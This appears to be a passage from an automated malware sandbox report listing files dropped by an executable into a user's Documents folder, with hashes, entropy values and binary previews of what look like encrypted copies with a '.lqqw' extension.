                                                                                                                                                                                                    MD5:7373D1A2894BB2F6319F5C131FFA2EA6
                                                                                                                                                                                                    SHA1:14FCF201F13AD79C394D17E4EFCF02376CEE306C
                                                                                                                                                                                                    SHA-256:16E642A168B9A8BE8B3DCE584B4B10D5D3364820023366FC1B0933C5625ED289
                                                                                                                                                                                                    SHA-512:A09F0C3C3FE5ECF76BCC206633A9022C806DA5BDC55DE2605C7BD7DA5447555607F41C57304314D112B402E5C7354F27B32EE8561C66BEC28E6E038730E1957E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .L.xy.=$.........@@/...u2zu.9.y.ix_'-.N....`..U.!(...<..........g...^.O..K...y.#.l.Xr..K.......Z..U..*....*6..L.U.+.4 .7f;.....Lk.iJ?........t.q.s.:..5I*...a.}.r.y.<..zS...t.auh]q!D(N!}.X...O.\..m.s..=&.7.P..$3.Gh...X../......$.y......Iru.8}..F.Z.-q......5..=l.7...S0P3V..H..]Z...|$=,Ag......=.K~.........Phw.m.M.T.....*W!.pz.0..2!A....m...`. ......j3f....P..%p.Y....+e~.....s~..J.XT.)...G...&3.....!`.`...../P..5.m.._.._..Wc..8Ii....>9!....A.a.<.=}..R.[SA.(G..&.....X..~.T.,.2H!.....Zy:..".^..vz0@...i.....5.........&..5..I........H?..=.".R8G..Z.......{....hy....G.A.q...|...p.r.a.|...................b..3+.......b.?.V.i...L./.~WI..>pz1.|T...N..SU.5./.u....Z))O*B...~.I.U9.Cg..A.*...0.j.+...>..-.d8...f...?...6#1.>N..>.p..l.*.i.._....;+.6.*F.H.....O.9-.8u..:*.....#.z...a^.g..$...(c..8.CM..../...ya.t....I....E...1O....N..p}.(f.p.^...z....._._...E .;.C..5F.....+..,...Fh....9a...p....E......?=.( .).3.bu...0............)& ....[..........+.|..Cg.d.!
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\CZQKSDDMWR.png.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.844384093216815
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:XZvZn1CUQdGhr0QT8MTNw1/+b8qnusQJ4Idsd/wBVJYYSh8yn4e9IbX2QwyGbD:9FcdGh4a8C+V+b8WusQ/dsd/yejn19I4
                                                                                                                                                                                                    MD5:7373D1A2894BB2F6319F5C131FFA2EA6
                                                                                                                                                                                                    SHA1:14FCF201F13AD79C394D17E4EFCF02376CEE306C
                                                                                                                                                                                                    SHA-256:16E642A168B9A8BE8B3DCE584B4B10D5D3364820023366FC1B0933C5625ED289
                                                                                                                                                                                                    SHA-512:A09F0C3C3FE5ECF76BCC206633A9022C806DA5BDC55DE2605C7BD7DA5447555607F41C57304314D112B402E5C7354F27B32EE8561C66BEC28E6E038730E1957E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .L.xy.=$.........@@/...u2zu.9.y.ix_'-.N....`..U.!(...<..........g...^.O..K...y.#.l.Xr..K.......Z..U..*....*6..L.U.+.4 .7f;.....Lk.iJ?........t.q.s.:..5I*...a.}.r.y.<..zS...t.auh]q!D(N!}.X...O.\..m.s..=&.7.P..$3.Gh...X../......$.y......Iru.8}..F.Z.-q......5..=l.7...S0P3V..H..]Z...|$=,Ag......=.K~.........Phw.m.M.T.....*W!.pz.0..2!A....m...`. ......j3f....P..%p.Y....+e~.....s~..J.XT.)...G...&3.....!`.`...../P..5.m.._.._..Wc..8Ii....>9!....A.a.<.=}..R.[SA.(G..&.....X..~.T.,.2H!.....Zy:..".^..vz0@...i.....5.........&..5..I........H?..=.".R8G..Z.......{....hy....G.A.q...|...p.r.a.|...................b..3+.......b.?.V.i...L./.~WI..>pz1.|T...N..SU.5./.u....Z))O*B...~.I.U9.Cg..A.*...0.j.+...>..-.d8...f...?...6#1.>N..>.p..l.*.i.._....;+.6.*F.H.....O.9-.8u..:*.....#.z...a^.g..$...(c..8.CM..../...ya.t....I....E...1O....N..p}.(f.p.^...z....._._...E .;.C..5F.....+..,...Fh....9a...p....E......?=.( .).3.bu...0............)& ....[..........+.|..Cg.d.!
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\EOWRVPQCCS.docx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.867234693219372
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:FshTNL9FwjP/hFSuhWHRFhao7nzrn5vl+xepxtPazuDj2/KxQmRN2tuyGklbD:FU99FwjP/ZQHRTTb35vl+8xZZj2CA2GD
                                                                                                                                                                                                    MD5:2322C98DA3504190390E4F9010E776C5
                                                                                                                                                                                                    SHA1:9189F94CD310727495CAA15F1C98E6D19B75D65A
                                                                                                                                                                                                    SHA-256:E00DDD98B200B0703AA793173D844F1BE3DB229CFDFC7E9EF0B0543888C42415
                                                                                                                                                                                                    SHA-512:F3DFA9A865B8A930044BF3805450CE46981A634B9FEEFC142C8C09011577034D96DD5FCBE0E71E48120CCCDD33EDD8F6923064D5AC565163889EC7DEE442C443
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .^.|....ycU...R7lV.L.+..C..l_.+......SEsn.t.C..".!.H.U.....$u. .C;..._..G.-~..f4....s....._..1.r..........5.....^d.;&\..;Y..:]lZ....^|.....GI.v.#ak.@....g.N.\X.$...9......Lr....Fq.3.sS.MQx.\Lb.......H..E.3.f.UQ9y.K.rp..(M....b./Fw..'7G.m.[.q|8..U0`...Y8#K... ....b'..;.......t@T8.Fo..(..`..>1.....1........r.l..+b.}."Y..#e..~...D.YMN..C.H.C.,|?...9.h....x.........Z5.K....pw0.x..>...s..b.H.m.vvM.......#=..../....%9.Z.x(a5.S.>...e...U..V3.G.jM.C.1.9D A.."k.s.3=....s........Z.....`.D..../...7.T.*.._9..zh..".Fbc..:..$q\S.../...juJ......T^CM.9..-...E.GA..u.l.?uK....H.OG.}.....F.q..y.....N.......n..Q......U.U\..q:DL.n....+Rjc M@.._,~....~.~.e....^3..|N.W..y....N.....;.4.....i[.r..}....(.4.-\..Q.......ST..{...%.=&4.oJ.UuE.d.Jd=-.b..*R?u...o..q7..7....[h..0I;<!..>.p.....&P8.}.{.......`.6...O.....Ilt.../I6...........o...&...S.-....i..bI.!l.F(sq..#.v.G......)].2,j....G...*q4m.i[..~.D.*..8..a..:.T|$D.p.[.....H...rIqnj...v..7.R..m1...fm.K..#.k..z.G
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\EOWRVPQCCS.docx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.867234693219372
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:FshTNL9FwjP/hFSuhWHRFhao7nzrn5vl+xepxtPazuDj2/KxQmRN2tuyGklbD:FU99FwjP/ZQHRTTb35vl+8xZZj2CA2GD
                                                                                                                                                                                                    MD5:2322C98DA3504190390E4F9010E776C5
                                                                                                                                                                                                    SHA1:9189F94CD310727495CAA15F1C98E6D19B75D65A
                                                                                                                                                                                                    SHA-256:E00DDD98B200B0703AA793173D844F1BE3DB229CFDFC7E9EF0B0543888C42415
                                                                                                                                                                                                    SHA-512:F3DFA9A865B8A930044BF3805450CE46981A634B9FEEFC142C8C09011577034D96DD5FCBE0E71E48120CCCDD33EDD8F6923064D5AC565163889EC7DEE442C443
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .^.|....ycU...R7lV.L.+..C..l_.+......SEsn.t.C..".!.H.U.....$u. .C;..._..G.-~..f4....s....._..1.r..........5.....^d.;&\..;Y..:]lZ....^|.....GI.v.#ak.@....g.N.\X.$...9......Lr....Fq.3.sS.MQx.\Lb.......H..E.3.f.UQ9y.K.rp..(M....b./Fw..'7G.m.[.q|8..U0`...Y8#K... ....b'..;.......t@T8.Fo..(..`..>1.....1........r.l..+b.}."Y..#e..~...D.YMN..C.H.C.,|?...9.h....x.........Z5.K....pw0.x..>...s..b.H.m.vvM.......#=..../....%9.Z.x(a5.S.>...e...U..V3.G.jM.C.1.9D A.."k.s.3=....s........Z.....`.D..../...7.T.*.._9..zh..".Fbc..:..$q\S.../...juJ......T^CM.9..-...E.GA..u.l.?uK....H.OG.}.....F.q..y.....N.......n..Q......U.U\..q:DL.n....+Rjc M@.._,~....~.~.e....^3..|N.W..y....N.....;.4.....i[.r..}....(.4.-\..Q.......ST..{...%.=&4.oJ.UuE.d.Jd=-.b..*R?u...o..q7..7....[h..0I;<!..>.p.....&P8.}.{.......`.6...O.....Ilt.../I6...........o...&...S.-....i..bI.!l.F(sq..#.v.G......)].2,j....G...*q4m.i[..~.D.*..8..a..:.T|$D.p.[.....H...rIqnj...v..7.R..m1...fm.K..#.k..z.G
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\EWZCVGNOWT.xlsx
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.852014783941688
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:YpOtna2L3yYJGMKp4mX4JKky1+vcDdQmFX22QAYb7F5ksQw3SsI5bD:YwA2L3BxfaYKkyPLQ9vkTwirD
                                                                                                                                                                                                    MD5:8027D8BCB864A19903D56B9613A2F0FA
                                                                                                                                                                                                    SHA1:AB6E735BE1D47201ABD15880BD06291ABA22682F
                                                                                                                                                                                                    SHA-256:CF1E961521490C632400377E91661531842F3D8ED3FEF2F6A608D6AABFE851E4
                                                                                                                                                                                                    SHA-512:9BAD660878CDF07EAA4135BAEAD287CFA08DD24A76323ED121AE4F9BE4190CE178F625CB7D2E904E5AB9CB9FBF345AD658CFD241C240F1D42B486D3E7F15D656
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: r.Y$-......../...gm.B...Z*.....e.PM..U.....F...8.. .....Ga~.b$j...=..|m..S`nL.1......;....q...-M..$.h.........9..x!./..{.m....o...Zn..i....1.@..5.3OK`.{..f.-.+)..].}.K.&...=T...2.........~....<#.s.].Ynidmw).'.-..S....h..d......c...`$x...N&......2~...0:W~}.$'......)PQ..A..fm.p.J.0.4L.e.6.e)._.8....oR<..&u4..qw.V..$].....:.(..0.qL.`..y...+.....z..^..:.H*@....f.W......%~...d..r............._..Y..K.H.....s~DTJ.N.b.Ji.....-L. z*~...@..f.9..C...3.?ckt.r.]k..y{..G..z...tb..\.n..k.(..H]M.<.....~.,5x@.#...Lt.W.Q.&..zX..#..Q...ny`...).I[..g0B.P.T.g|..x.f.f..9...7..)R.....OA.....^....i.j.e......./...a..v...\....q.#G../A.|.|2.^..!Q `.....Z....#....=b..)V..;...iU...@6...N.;...:K6..T\.qT..zo...S..\>..?..c.\F..Z.....U.b.FN\.yJi...G....zq..~.-.9.[Y+e.../Sp......f..)...Q6..5?a ..o.......u.y...SI.w.p.......Z.".vC.....r......q.hP...y%u..$d..%G.m.P|s.P..G..........>F.........v{...2........6..ZSK/...H.......IB.8..u....A.....TMhtPJ3..SH.%.n.A[.^...^*.Q
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\EWZCVGNOWT.xlsx.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.852014783941688
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:YpOtna2L3yYJGMKp4mX4JKky1+vcDdQmFX22QAYb7F5ksQw3SsI5bD:YwA2L3BxfaYKkyPLQ9vkTwirD
                                                                                                                                                                                                    MD5:8027D8BCB864A19903D56B9613A2F0FA
                                                                                                                                                                                                    SHA1:AB6E735BE1D47201ABD15880BD06291ABA22682F
                                                                                                                                                                                                    SHA-256:CF1E961521490C632400377E91661531842F3D8ED3FEF2F6A608D6AABFE851E4
                                                                                                                                                                                                    SHA-512:9BAD660878CDF07EAA4135BAEAD287CFA08DD24A76323ED121AE4F9BE4190CE178F625CB7D2E904E5AB9CB9FBF345AD658CFD241C240F1D42B486D3E7F15D656
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: r.Y$-......../...gm.B...Z*.....e.PM..U.....F...8.. .....Ga~.b$j...=..|m..S`nL.1......;....q...-M..$.h.........9..x!./..{.m....o...Zn..i....1.@..5.3OK`.{..f.-.+)..].}.K.&...=T...2.........~....<#.s.].Ynidmw).'.-..S....h..d......c...`$x...N&......2~...0:W~}.$'......)PQ..A..fm.p.J.0.4L.e.6.e)._.8....oR<..&u4..qw.V..$].....:.(..0.qL.`..y...+.....z..^..:.H*@....f.W......%~...d..r............._..Y..K.H.....s~DTJ.N.b.Ji.....-L. z*~...@..f.9..C...3.?ckt.r.]k..y{..G..z...tb..\.n..k.(..H]M.<.....~.,5x@.#...Lt.W.Q.&..zX..#..Q...ny`...).I[..g0B.P.T.g|..x.f.f..9...7..)R.....OA.....^....i.j.e......./...a..v...\....q.#G../A.|.|2.^..!Q `.....Z....#....=b..)V..;...iU...@6...N.;...:K6..T\.qT..zo...S..\>..?..c.\F..Z.....U.b.FN\.yJi...G....zq..~.-.9.[Y+e.../Sp......f..)...Q6..5?a ..o.......u.y...SI.w.p.......Z.".vC.....r......q.hP...y%u..$d..%G.m.P|s.P..G..........>F.........v{...2........6..ZSK/...H.......IB.8..u....A.....TMhtPJ3..SH.%.n.A[.^...^*.Q
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\LFOPODGVOH.mp3
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:SysEx File -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.842584068319555
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:dqvlxk1AG+oP2PT7IEHlL8QLXjKONtbFxmdUA3SI/4H+Ex7CoOGeyGoCGzuCWvbD:dKU1dElrXj/NtbFxI3SZHF7Co4oE3D
                                                                                                                                                                                                    MD5:1947CB860AA038BCA5A2D52ACED4D443
                                                                                                                                                                                                    SHA1:0D73FBBCA7EDFD03F74C5558BFAA98ED8F5B3579
                                                                                                                                                                                                    SHA-256:2C31CD0289B8774683F4ECE347AA28F1E7808AD774EDE53A0B49497A2B4AAB7C
                                                                                                                                                                                                    SHA-512:0E2DB31F2C0717EA981FBB9FBF01485FF380D8BF29349C97A8A5C18D7ABE1F10630667FEFA5A46F703ACC308D893D37A7CED35D715AAF8B11AF3BD4110565C35
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..E.O&...2...$.....TR...}HK.(.>.bS-K.r#..=}...G...=.#...u.u/.q.....F.:>q8....d.`.....f8....W.Y..7...>2.#..Y.S.-d....3L..D.Bt..-.Q..?I.`kA....QRne........6z....0....Y....=....'+7Tr5..U..>6...Z.]...IO31..]fW9..POV..4.1x(.u.`.q!.....;.....L(@.... ..N.ll'B....wp<...{...U.{.....|:.z.b..O.l...U...nQ...(....s..._.._Z...&.JF&.....30..u!.A.$.4/%.#....&=.F/C#....&}..KM..:.4 ..1Bg...g3.....v.D. ..wr..e39..$_..).s&...7NO...e..&.0..Ij.AF..*.....Q~..B...+rq..e,......#.........._..%v-s....#=...V..l....k..`Z...p..$,.. 6I.v.)m@I...!.vw.:.... ...4...<..1e...Id.r....N..>.DM....jp..[.............,p...G.C.....R|sL'.Kfz.^.tqS.l.'.x..v.sF......>?B.J....q.>..n.4.K.5.p.R@.(..k;X...^..{.....).J...k.q.X>."g....0Ewx...b..$g,...R._.2..P...x....gKG....<...T...EJdNh.x...cd....=.C...(.W.h...b..a.w.. .....B.W....#...xrSpC<S.....Pp....3...R.%..I!wZ.....b........H...w....4..S...w.IS|N._........V...}......j^..s.......b......2#.&-.7..hO..iRI..J.Oq0w'.@..UF.j...0.]
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\LFOPODGVOH.mp3.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:SysEx File -
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.842584068319555
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:dqvlxk1AG+oP2PT7IEHlL8QLXjKONtbFxmdUA3SI/4H+Ex7CoOGeyGoCGzuCWvbD:dKU1dElrXj/NtbFxI3SZHF7Co4oE3D
                                                                                                                                                                                                    MD5:1947CB860AA038BCA5A2D52ACED4D443
                                                                                                                                                                                                    SHA1:0D73FBBCA7EDFD03F74C5558BFAA98ED8F5B3579
                                                                                                                                                                                                    SHA-256:2C31CD0289B8774683F4ECE347AA28F1E7808AD774EDE53A0B49497A2B4AAB7C
                                                                                                                                                                                                    SHA-512:0E2DB31F2C0717EA981FBB9FBF01485FF380D8BF29349C97A8A5C18D7ABE1F10630667FEFA5A46F703ACC308D893D37A7CED35D715AAF8B11AF3BD4110565C35
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..E.O&...2...$.....TR...}HK.(.>.bS-K.r#..=}...G...=.#...u.u/.q.....F.:>q8....d.`.....f8....W.Y..7...>2.#..Y.S.-d....3L..D.Bt..-.Q..?I.`kA....QRne........6z....0....Y....=....'+7Tr5..U..>6...Z.]...IO31..]fW9..POV..4.1x(.u.`.q!.....;.....L(@.... ..N.ll'B....wp<...{...U.{.....|:.z.b..O.l...U...nQ...(....s..._.._Z...&.JF&.....30..u!.A.$.4/%.#....&=.F/C#....&}..KM..:.4 ..1Bg...g3.....v.D. ..wr..e39..$_..).s&...7NO...e..&.0..Ij.AF..*.....Q~..B...+rq..e,......#.........._..%v-s....#=...V..l....k..`Z...p..$,.. 6I.v.)m@I...!.vw.:.... ...4...<..1e...Id.r....N..>.DM....jp..[.............,p...G.C.....R|sL'.Kfz.^.tqS.l.'.x..v.sF......>?B.J....q.>..n.4.K.5.p.R@.(..k;X...^..{.....).J...k.q.X>."g....0Ewx...b..$g,...R._.2..P...x....gKG....<...T...EJdNh.x...cd....=.C...(.W.h...b..a.w.. .....B.W....#...xrSpC<S.....Pp....3...R.%..I!wZ.....b........H...w....4..S...w.IS|N._........V...}......j^..s.......b......2#.&-.7..hO..iRI..J.Oq0w'.@..UF.j...0.]
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\NYMMPCEIMA.jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.812507483514707
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:1zHPMzM7ZOIWsTMqRazsUinE2sThlnrdCxWOqRxcRaD6GLq0N/iRbD:VHEY0IJTJRWhLnr0xWOqRxc8hh/UD
                                                                                                                                                                                                    MD5:80A44BCFFEB72B8529250F7C1DD9544F
                                                                                                                                                                                                    SHA1:75087FA8CFCFB47FDA9153E02A82C4F3864D63A3
                                                                                                                                                                                                    SHA-256:23CC0129702C526EA6249B183463EC31F27A2B6BDFB8EBDCCB9FD20E32EFE2F8
                                                                                                                                                                                                    SHA-512:003B0D5E3CA35B66A0F3B1BED87A6E76733FE0EB51B2EF3CFCB02E33D7B06AB7C1FE610770822CBDC2DC613E9FF528731283F0EDCA92F24A848137681812BCE2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..S'..Uk..H0.....LI..XwL&...$4BKty.F.&.y....D.*.Y........*&........C.j...C...E.@...:0.......>_&...S...7Z.x.T..0..<:.h.../.>..Rb.c..o.T...G).x..........EN..jIG..P.{.......%....tH..N...#c..<a.V..n.M.o.._'z..lO..E2...).mm...*..~.=......8T...y#.).cn%.+.|D<....l......U.nD....D.[....i.I[.w..|]Q`...=.z.x.....M.A..w......%V.&....b.>....'.D..l.>.J}w.5.G.0.G....[.W..J........._.c.h.H..E.h.......e.Ku......5....K.AN."....D......S.*He...O..FFV9m.B...F...U.=.|.....V...e..?8.+....*..?.<.+G$.d}...........z.....E...v.2.+G..gI...z...P.(..'}G.....|j..<..RS....;.xc.Z...h.....J.F....+G{.6.B..w.*...d.).R#T..7....O=v%..Zt.9.<h.@.F..k.....J...f...,.S..UR..0...z....-...U.$..4*Jx..r.l...]{.T.s...w.$.....JN.?..k`.0..<h..x.|.E.......<Nj./.0..wQ....y...V[.o..%.-...L./..{.....$.=..J%3r..a...<.q.^.I..6.@.L>..*~...4.......tq....8.L...r.........j...s.......:me<.nU......(&u...........]..'_.....E{.d-....{i6.hT.k...&....G.......Gw........o.I/...-..h.&o\k..l..........,f.k
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\NYMMPCEIMA.jpg.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.812507483514707
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:1zHPMzM7ZOIWsTMqRazsUinE2sThlnrdCxWOqRxcRaD6GLq0N/iRbD:VHEY0IJTJRWhLnr0xWOqRxc8hh/UD
                                                                                                                                                                                                    MD5:80A44BCFFEB72B8529250F7C1DD9544F
                                                                                                                                                                                                    SHA1:75087FA8CFCFB47FDA9153E02A82C4F3864D63A3
                                                                                                                                                                                                    SHA-256:23CC0129702C526EA6249B183463EC31F27A2B6BDFB8EBDCCB9FD20E32EFE2F8
                                                                                                                                                                                                    SHA-512:003B0D5E3CA35B66A0F3B1BED87A6E76733FE0EB51B2EF3CFCB02E33D7B06AB7C1FE610770822CBDC2DC613E9FF528731283F0EDCA92F24A848137681812BCE2
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..S'..Uk..H0.....LI..XwL&...$4BKty.F.&.y....D.*.Y........*&........C.j...C...E.@...:0.......>_&...S...7Z.x.T..0..<:.h.../.>..Rb.c..o.T...G).x..........EN..jIG..P.{.......%....tH..N...#c..<a.V..n.M.o.._'z..lO..E2...).mm...*..~.=......8T...y#.).cn%.+.|D<....l......U.nD....D.[....i.I[.w..|]Q`...=.z.x.....M.A..w......%V.&....b.>....'.D..l.>.J}w.5.G.0.G....[.W..J........._.c.h.H..E.h.......e.Ku......5....K.AN."....D......S.*He...O..FFV9m.B...F...U.=.|.....V...e..?8.+....*..?.<.+G$.d}...........z.....E...v.2.+G..gI...z...P.(..'}G.....|j..<..RS....;.xc.Z...h.....J.F....+G{.6.B..w.*...d.).R#T..7....O=v%..Zt.9.<h.@.F..k.....J...f...,.S..UR..0...z....-...U.$..4*Jx..r.l...]{.T.s...w.$.....JN.?..k`.0..<h..x.|.E.......<Nj./.0..wQ....y...V[.o..%.-...L./..{.....$.=..J%3r..a...<.q.^.I..6.@.L>..*~...4.......tq....8.L...r.........j...s.......:me<.nU......(&u...........]..'_.....E{.d-....{i6.hT.k...&....G.......Gw........o.I/...-..h.&o\k..l..........,f.k
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\TQDFJHPUIU.pdf
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.845671987472812
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:fCLJQZQikYrB+hbWUtmYD3YiSJuvxJBuUWNylfiUlBTifR0BWU8Dvd+rZCW7DtbD:GJQ9kw2TS0fBKojlIl5D4AgND
                                                                                                                                                                                                    MD5:8CF91E667B3A9E61B30C694681A19D1D
                                                                                                                                                                                                    SHA1:DE91355D7148A88BAEE4076FEF979F32E426CAB0
                                                                                                                                                                                                    SHA-256:CC878EBDA6C99FDF5AA9F436DF460CD6921A515F9528865E682E3D3DFD6E051A
                                                                                                                                                                                                    SHA-512:2F58E9AEC193FB8D72C12C8514B6D51C3DF15D8029733A4D54DE3CFE3A641F69DC5B179C6C0545ACDDBE3AD2A8D4E1C9C8E6223631DF5992439024ACDE51F58A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: e{o.v^..%..":y.D\....I.AS.O...>..?.NAK"..%W.....7.....n..}....D.f.M2.....{xlD4...5s..!_....'.......n..........#.$.i.Dp..Rl.3.d..F[Q%.a..6.x&..]"I.;?.(P,A5.8....(.... M.l....o.&.X4".M.v....\....\..HH..........9..m.K#S..B..tp..J.5.|...k.......+.tJ.b..1.).yP...3.s..dK.d.g...3...w.'.....K....j..<.P...-.........N.+..%o..'.K....:f..M.#@.A.gR.A...Y>S[9....c.U.=.uf..'...Dh.M.!W...1....5..<6..3;....\...0Z.5.n.......$....Iyb#.....a.?.......-..E...x...l.>.4`/*,.j...>P.[#B...$*....."..x..%l..Q..aA.Q.......El..S."R.}]{.8N.../...^O.:.^]...>...H..q..PB.....l.8S.....kFoE.......;W.....P........_.}..RK.!.....{.......q......\E.Y.......!C..&S)2.Q.|...K.......).k............`.`.Nw.4.).....C..x%y..|q.U....C...}25.....1...xD..._.0A.. z6....s....s.bW.....g.i.&.Y..IC%.E......D..94....Z..5=.~..>....5..%....(..n...O...X..w.......x..w..>.......2..O=@}..3e.....c.O.hY.tO1t.5)."X..A$.a^$p.d..w....=...!'.T.. ...x.....@.e+.kxi]Nx...\x...{S.4.:f.D.......'...hN....1..%..q
                                                                                                                                                                                                    C:\Users\user\Documents\EOWRVPQCCS\TQDFJHPUIU.pdf.lqqw (copy)
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1355
                                                                                                                                                                                                    Entropy (8bit):7.845671987472812
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:fCLJQZQikYrB+hbWUtmYD3YiSJuvxJBuUWNylfiUlBTifR0BWU8Dvd+rZCW7DtbD:GJQ9kw2TS0fBKojlIl5D4AgND
                                                                                                                                                                                                    MD5:8CF91E667B3A9E61B30C694681A19D1D
                                                                                                                                                                                                    SHA1:DE91355D7148A88BAEE4076FEF979F32E426CAB0
                                                                                                                                                                                                    SHA-256:CC878EBDA6C99FDF5AA9F436DF460CD6921A515F9528865E682E3D3DFD6E051A
                                                                                                                                                                                                    SHA-512:2F58E9AEC193FB8D72C12C8514B6D51C3DF15D8029733A4D54DE3CFE3A641F69DC5B179C6C0545ACDDBE3AD2A8D4E1C9C8E6223631DF5992439024ACDE51F58A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: e{o.v^..%..":y.D\....I.AS.O...>..?.NAK"..%W.....7.....n..}....D.f.M2.....{xlD4...5s..!_....'.......n..........#.$.i.Dp..Rl.3.d..F[Q%.a..6.x&..]"I.;?.(P,A5.8....(.... M.l....o.&.X4".M.v....\....\..HH..........9..m.K#S..B..tp..J.5.|...k.......+.tJ.b..1.).yP...3.s..dK.d.g...3...w.'.....K....j..<.P...-.........N.+..%o..'.K....:f..M.#@.A.gR.A...Y>S[9....c.U.=.uf..'...Dh.M.!W...1....5..<6..3;....\...0Z.5.n.......$....Iyb#.....a.?.......-..E...x...l.>.4`/*,.j...>P.[#B...$*....."..x..%l..Q..aA.Q.......El..S."R.}]{.8N.../...^O.:.^]...>...H..q..PB.....l.8S.....kFoE.......;W.....P........_.}..RK.!.....{.......q......\E.Y.......!C..&S)2.Q.|...K.......).k............`.`.Nw.4.).....C..x%y..|q.U....C...}25.....1...xD..._.0A.. z6....s....s.bW.....g.i.&.Y..IC%.E......D..94....Z..5=.~..>....5..%....(..n...O...X..w.......x..w..>.......2..O=@}..3e.....c.O.hY.tO1t.5)."X..A$.a^$p.d..w....=...!'.T.. ...x.....@.e+.kxi]Nx...\x...{S.4.:f.D.......'...hN....1..%..q
                                                                                                                                                                                                    C:\Users\user\Documents\EWZCVGNOWT.xlsx
